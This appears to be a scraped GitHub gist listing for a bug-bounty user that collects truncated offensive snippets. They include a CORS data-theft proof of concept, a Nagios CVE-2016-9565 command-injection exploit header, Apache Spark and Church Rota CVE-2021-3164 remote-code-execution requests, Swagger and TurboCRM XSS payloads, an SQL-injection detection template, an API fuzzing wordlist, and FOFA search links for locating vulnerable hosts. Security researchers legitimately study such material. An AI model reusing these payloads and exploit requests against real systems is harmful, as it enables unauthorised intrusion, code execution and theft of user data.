This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
haka110
haka110
/ List of API endpoints & objects
Created
February 6, 2023 04:29
— forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
haka110
/ JavascriptRecon.md
Created
January 20, 2023 07:30
— forked from fuckup1337/JavascriptRecon.md
My Javascript Recon Process - BugBounty
haka110
/ gist:da3e579bbf5e13a66473328ae1ffcbbd
Created
December 1, 2022 07:02
— forked from pikpikcu/gist:fd90959881691bab11eb4d8b02acd6ea
CORS.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <button type='button' onclick='cors()'>CORS</button> | |
| <p id='demo'></p> | |
| <script> | |
| function cors() { | |
| var xhttp = new XMLHttpRequest(); | |
| xhttp.onreadystatechange = function() { | |
| if (this.readyState == 4 && this.status == 200) { | |
| var a = this.responseText; // Sensitive data from niche.co about user account |
haka110
/ sqli2.yaml
Created
December 1, 2022 07:02
— forked from pikpikcu/sqli2.yaml
Basic SQL Injection Detections nuclei Template
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: SQLInjection_ERROR | |
| info: | |
| name: SQLINJECTION Detection | |
| author: 0x240x23elu & OFJAAAH | |
| severity: High | |
| requests: | |
| - method: GET |
haka110
/ Apache-Sprak-RCE.md
Created
December 1, 2022 07:02
— forked from pikpikcu/Apache-Sprak-RCE.md
Apache Sprak RCE
POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{
haka110
/ nagios_cmd_injection.py
Created
December 1, 2022 07:02
— forked from pikpikcu/nagios_cmd_injection.py
Nagios Exploit Command Injection CVE-2016-9565
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| intro = """\033[94m | |
| Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565) | |
| nagios_cmd_injection.py ver. 1.0 | |
| Discovered & Coded by: | |
| Dawid Golunski | |
| https://legalhackers.com | |
| \033[0m |
haka110
/ swagerxss.json
Created
December 1, 2022 06:51
— forked from pikpikcu/swagerxss.json
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "title": "Swagger Test Poc XSS", | |
| "description": "Please to click Terms of service", | |
| "termsOfService": "javasript:alert(document.domain)", | |
| "version": "1.0.1" | |
| }, | |
| "basePath": "/v1", | |
| "schemes": [ |
haka110
/ tes.yaml
Created
December 1, 2022 06:45
— forked from pikpikcu/tes.yaml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Swagger Test | |
| description: <img src=x onerror=\"alert(document.domain)\"> | |
| default: <script>console.log(‘000000000000000000dad0000000000000000000');</script> | |
| license: | |
| name: BSD | |
| url: <img src=x onerror=\"alert(document.domain)\"> | |
| version: '30' | |
| produces: |
haka110
/ cve-2021-3164.md
Created
December 1, 2022 06:45
— forked from pikpikcu/cve-2021-3164.md
POC cve-2021-3164 Church Rota version 2.6.4
Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file.
POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526
haka110
/ TurboCRM-XSS.md
Created
December 1, 2022 06:34
— forked from pikpikcu/TurboCRM-XSS.md
- https://fofa.so/result?qbase64=YXBwPSLnlKjlj4stVHVyYm9DUk0i
- https://fofa.so/result?qbase64=dGl0bGU9IueUqOWPiy1UdXJib0NSTSI%3D
"><script>alert(/XSS/)</script>
NewerOlder